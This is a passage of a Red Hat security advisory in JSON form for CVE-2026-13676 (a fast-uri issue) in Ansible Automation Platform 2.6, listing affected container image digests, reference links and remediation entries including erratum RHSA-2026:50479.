"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-13676"
},
{
"category": "external",
"summary": "RHBZ#2494197",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2494197"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-13676",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-13676"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-13676",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-13676"
},
{
"category": "external",
"summary": "https://cna.openjsf.org/security-advisories.html",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"category": "external",
"summary": "https://github.com/fastify/fast-uri/security/advisories/GHSA-4c8g-83qw-93j6",
"url": "https://github.com/fastify/fast-uri/security/advisories/GHSA-4c8g-83qw-93j6"
}
],
"release_date": "2026-06-29T13:22:44.674000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T21:39:16+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50479"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
